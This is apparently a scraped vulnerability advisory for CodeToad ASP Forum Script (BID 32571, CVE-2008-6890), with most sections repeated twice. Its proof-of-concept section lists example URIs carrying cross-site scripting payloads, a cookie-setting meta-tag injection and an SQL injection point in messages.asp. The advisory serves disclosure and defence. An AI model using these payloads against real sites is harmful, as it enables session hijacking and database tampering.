ASP Forum Script SQL Injection and Cross Site Scripting Vulnerabilities
BID:32571
Info
ASP Forum Script SQL Injection and Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 32571 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6890 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 01 2008 12:00AM |
| Updated: | Apr 13 2015 08:11PM |
| Credit: | Pouya_Server |
| Vulnerable: |
CodeToad ASP Forum Script 0 |
| Not Vulnerable: | |
Discussion
ASP Forum Script SQL Injection and Cross Site Scripting Vulnerabilities
ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
ASP Forum Script SQL Injection and Cross Site Scripting Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/[Path]/messages.asp?forum_id=3&message_id=[SQL]
http://www.example.com/[Path]/new_message.asp?topic_id=0&message_id=0&forum_id=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
http://www.example.com/[Path]/messages.asp?forum_id=>'><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&message_id=197
http://www.example.com/[Path]/new_message.asp?topic_id=0&message_id=0&forum_id=<script>alert(1369)</script>
http://www.example.com/[Path]/default.asp?>"'><ScRiPt>alert(1369)</ScRiPt>
An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/[Path]/messages.asp?forum_id=3&message_id=[SQL]
http://www.example.com/[Path]/new_message.asp?topic_id=0&message_id=0&forum_id=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
http://www.example.com/[Path]/messages.asp?forum_id=>'><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&message_id=197
http://www.example.com/[Path]/new_message.asp?topic_id=0&message_id=0&forum_id=<script>alert(1369)</script>
http://www.example.com/[Path]/default.asp?>"'><ScRiPt>alert(1369)</ScRiPt>
Solution / Fix
ASP Forum Script SQL Injection and Cross Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ASP Forum Script SQL Injection and Cross Site Scripting Vulnerabilities
References:
References:
- ASP Forum Script Homepage (CodeToad)